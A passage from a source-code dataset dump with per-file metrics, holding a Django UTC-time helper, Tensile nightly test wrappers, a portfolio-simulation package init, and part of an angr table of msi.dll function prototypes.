] | 57 | 2015-01-06T11:34:41.000Z | 2022-01-14T10:59:52.000Z | import datetime
from django.utils.timezone import utc
def get_utc_now():
return datetime.datetime.utcnow().replace(tzinfo=utc)
| 16.75 | 57 | 0.776119 | 19 | 134 | 5.368421 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126866 | 134 | 7 | 58 | 19.142857 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
3971f26f22a5077791300e2bb60451100b433ed4 | 691 | py | Python | Tensile/Tests/nightly/fractional/test_fractional.py | zjunweihit/Tensile | 68b73083c92eecc1b04eec1f006f28aea5628030 | [
"MIT"
] | null | null | null | Tensile/Tests/nightly/fractional/test_fractional.py | zjunweihit/Tensile | 68b73083c92eecc1b04eec1f006f28aea5628030 | [
"MIT"
] | null | null | null | Tensile/Tests/nightly/fractional/test_fractional.py | zjunweihit/Tensile | 68b73083c92eecc1b04eec1f006f28aea5628030 | [
"MIT"
] | 5 | 2019-07-29T01:23:56.000Z | 2022-03-08T09:28:10.000Z | import Tensile.Tensile as Tensile
def test_dgemm_fractional_tile_sweep(tmpdir):
Tensile.Tensile([Tensile.TensileTestPath("nightly/fractional/test_dgemm_fractional_tile_sweep.yaml"), tmpdir.strpath])
def test_hgemm_fractional_tile_sweep(tmpdir):
Tensile.Tensile([Tensile.TensileTestPath("nightly/fractional/test_hgemm_fractional_tile_sweep.yaml"), tmpdir.strpath])
def test_sgemm_fractional_edge(tmpdir):
Tensile.Tensile([Tensile.TensileTestPath("nightly/fractional/test_sgemm_fractional_edge.yaml"), tmpdir.strpath])
def test_sgemm_fractional_tile_sweep(tmpdir):
Tensile.Tensile([Tensile.TensileTestPath("nightly/fractional/test_sgemm_fractional_tile_sweep.yaml"), tmpdir.strpath])
| 46.066667 | 119 | 0.852388 | 87 | 691 | 6.425287 | 0.195402 | 0.225403 | 0.203936 | 0.193202 | 0.928444 | 0.88551 | 0.838998 | 0.760286 | 0.60644 | 0.60644 | 0 | 0 | 0.041968 | 691 | 14 | 120 | 49.357143 | 0.844411 | 0 | 0 | 0 | 0 | 0 | 0.315942 | 0.315942 | 0 | 0 | 0 | 0 | 0 | 1 | 0.444444 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
39b355de9b26bf74516a81a40effb7eef22be6fe | 611 | py | Python | pfstratsim/utils/__init__.py | aarondorffeld/portfolio-strategy-simulation | 8c4771df24e3c45865c7df2a68e51ef018f7be1b | [
"MIT"
] | null | null | null | pfstratsim/utils/__init__.py | aarondorffeld/portfolio-strategy-simulation | 8c4771df24e3c45865c7df2a68e51ef018f7be1b | [
"MIT"
] | 42 | 2021-11-06T15:19:49.000Z | 2022-01-23T16:38:21.000Z | pfstratsim/utils/__init__.py | aarondorffeld/portfolio-strategy-simulation | 8c4771df24e3c45865c7df2a68e51ef018f7be1b | [
"MIT"
] | null | null | null | from .parameter_calculation import (
calc_asset_returns, calc_asset_obsrvd_returns, calc_asset_obsrvd_risks, calc_corr_cf,
calc_asset_expctd_returns, calc_asset_expctd_risks,
calc_prtfl_obsrvd_return, calc_prtfl_obsrvd_risk,
)
from .parameter_setting import read_params
from .plotting import plot
__all__ = [
"calc_asset_returns",
"calc_asset_obsrvd_returns",
"calc_asset_obsrvd_risks",
"calc_corr_cf",
"calc_asset_expctd_returns",
"calc_asset_expctd_risks",
"calc_prtfl_obsrvd_return",
"calc_prtfl_obsrvd_risk",
"read_params",
"plot",
]
| 29.095238 | 90 | 0.747954 | 78 | 611 | 5.192308 | 0.269231 | 0.222222 | 0.237037 | 0.217284 | 0.740741 | 0.740741 | 0.740741 | 0.740741 | 0.740741 | 0.740741 | 0 | 0 | 0.176759 | 611 | 20 | 91 | 30.55 | 0.805169 | 0 | 0 | 0 | 0 | 0 | 0.316413 | 0.240271 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.157895 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f2d35c0b892ea6cb0c929a246b521b441e3b20df | 111,815 | py | Python | angr/procedures/definitions/win32_msi.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_msi.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_msi.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | # pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("msi.dll")
prototypes = \
{
#
'MsiCloseHandle': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hAny"]),
#
'MsiCloseAllHandles': SimTypeFunction([], SimTypeInt(signed=False, label="UInt32")),
#
'MsiSetInternalUI': SimTypeFunction([SimTypeInt(signed=False, label="INSTALLUILEVEL"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="INSTALLUILEVEL"), arg_names=["dwUILevel", "phWnd"]),
#
'MsiSetExternalUIA': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "szMessage"]), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "szMessage"]), offset=0), arg_names=["puiHandler", "dwMessageFilter", "pvContext"]),
#
'MsiSetExternalUIW': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "szMessage"]), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "szMessage"]), offset=0), arg_names=["puiHandler", "dwMessageFilter", "pvContext"]),
#
'MsiSetExternalUIRecord': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "hRecord"]), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "hRecord"]), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["puiHandler", "dwMessageFilter", "pvContext", "ppuiPrevHandler"]),
#
'MsiEnableLogA': SimTypeFunction([SimTypeInt(signed=False, label="INSTALLOGMODE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwLogMode", "szLogFile", "dwLogAttributes"]),
#
'MsiEnableLogW': SimTypeFunction([SimTypeInt(signed=False, label="INSTALLOGMODE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwLogMode", "szLogFile", "dwLogAttributes"]),
#
'MsiQueryProductStateA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct"]),
#
'MsiQueryProductStateW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct"]),
#
'MsiGetProductInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szAttribute", "lpValueBuf", "pcchValueBuf"]),
#
'MsiGetProductInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szAttribute", "lpValueBuf", "pcchValueBuf"]),
#
'MsiGetProductInfoExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szProperty", "szValue", "pcchValue"]),
#
'MsiGetProductInfoExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szProperty", "szValue", "pcchValue"]),
#
'MsiInstallProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szCommandLine"]),
#
'MsiInstallProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szCommandLine"]),
#
'MsiConfigureProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLLEVEL"), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iInstallLevel", "eInstallState"]),
#
'MsiConfigureProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLLEVEL"), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iInstallLevel", "eInstallState"]),
#
'MsiConfigureProductExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLLEVEL"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iInstallLevel", "eInstallState", "szCommandLine"]),
#
'MsiConfigureProductExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLLEVEL"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iInstallLevel", "eInstallState", "szCommandLine"]),
#
'MsiReinstallProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="REINSTALLMODE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szReinstallMode"]),
#
'MsiReinstallProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="REINSTALLMODE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szReinstallMode"]),
#
'MsiAdvertiseProductExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szScriptfilePath", "szTransforms", "lgidLanguage", "dwPlatform", "dwOptions"]),
#
'MsiAdvertiseProductExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szScriptfilePath", "szTransforms", "lgidLanguage", "dwPlatform", "dwOptions"]),
#
'MsiAdvertiseProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeShort(signed=False, label="UInt16")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szScriptfilePath", "szTransforms", "lgidLanguage"]),
#
'MsiAdvertiseProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeShort(signed=False, label="UInt16")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szScriptfilePath", "szTransforms", "lgidLanguage"]),
#
'MsiProcessAdvertiseScriptA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "szIconFolder", "hRegData", "fShortcuts", "fRemoveItems"]),
#
'MsiProcessAdvertiseScriptW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "szIconFolder", "hRegData", "fShortcuts", "fRemoveItems"]),
#
'MsiAdvertiseScriptA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "dwFlags", "phRegData", "fRemoveItems"]),
#
'MsiAdvertiseScriptW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "dwFlags", "phRegData", "fRemoveItems"]),
#
'MsiGetProductInfoFromScriptA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "lpProductBuf39", "plgidLanguage", "pdwVersion", "lpNameBuf", "pcchNameBuf", "lpPackageBuf", "pcchPackageBuf"]),
#
'MsiGetProductInfoFromScriptW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "lpProductBuf39", "plgidLanguage", "pdwVersion", "lpNameBuf", "pcchNameBuf", "lpPackageBuf", "pcchPackageBuf"]),
#
'MsiGetProductCodeA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "lpBuf39"]),
#
'MsiGetProductCodeW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "lpBuf39"]),
#
'MsiGetUserInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="USERINFOSTATE"), arg_names=["szProduct", "lpUserNameBuf", "pcchUserNameBuf", "lpOrgNameBuf", "pcchOrgNameBuf", "lpSerialBuf", "pcchSerialBuf"]),
#
'MsiGetUserInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="USERINFOSTATE"), arg_names=["szProduct", "lpUserNameBuf", "pcchUserNameBuf", "lpOrgNameBuf", "pcchOrgNameBuf", "lpSerialBuf", "pcchSerialBuf"]),
#
'MsiCollectUserInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct"]),
#
'MsiCollectUserInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct"]),
#
'MsiApplyPatchA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLTYPE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPackage", "szInstallPackage", "eInstallType", "szCommandLine"]),
#
'MsiApplyPatchW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLTYPE"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPackage", "szInstallPackage", "eInstallType", "szCommandLine"]),
#
'MsiGetPatchInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatch", "szAttribute", "lpValueBuf", "pcchValueBuf"]),
#
'MsiGetPatchInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatch", "szAttribute", "lpValueBuf", "pcchValueBuf"]),
#
'MsiEnumPatchesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iPatchIndex", "lpPatchBuf", "lpTransformsBuf", "pcchTransformsBuf"]),
#
'MsiEnumPatchesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iPatchIndex", "lpPatchBuf", "lpTransformsBuf", "pcchTransformsBuf"]),
#
'MsiRemovePatchesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLTYPE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchList", "szProductCode", "eUninstallType", "szPropertyList"]),
#
'MsiRemovePatchesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLTYPE"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchList", "szProductCode", "eUninstallType", "szPropertyList"]),
#
'MsiExtractPatchXMLDataA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPath", "dwReserved", "szXMLData", "pcchXMLData"]),
#
'MsiExtractPatchXMLDataW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPath", "dwReserved", "szXMLData", "pcchXMLData"]),
#
'MsiGetPatchInfoExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchCode", "szProductCode", "szUserSid", "dwContext", "szProperty", "lpValue", "pcchValue"]),
#
'MsiGetPatchInfoExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchCode", "szProductCode", "szUserSid", "dwContext", "szProperty", "lpValue", "pcchValue"]),
#
'MsiApplyMultiplePatchesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPackages", "szProductCode", "szPropertiesList"]),
#
'MsiApplyMultiplePatchesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPackages", "szProductCode", "szPropertiesList"]),
#
'MsiDeterminePatchSequenceA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"szPatchData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "ePatchDataType": SimTypeInt(signed=False, label="MSIPATCHDATATYPE"), "dwOrder": SimTypeInt(signed=False, label="UInt32"), "uStatus": SimTypeInt(signed=False, label="UInt32")}, name="MSIPATCHSEQUENCEINFOA", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "cPatchInfo", "pPatchInfo"]),
#
'MsiDeterminePatchSequenceW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"szPatchData": SimTypePointer(SimTypeChar(label="Char"), offset=0), "ePatchDataType": SimTypeInt(signed=False, label="MSIPATCHDATATYPE"), "dwOrder": SimTypeInt(signed=False, label="UInt32"), "uStatus": SimTypeInt(signed=False, label="UInt32")}, name="MSIPATCHSEQUENCEINFOW", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "cPatchInfo", "pPatchInfo"]),
#
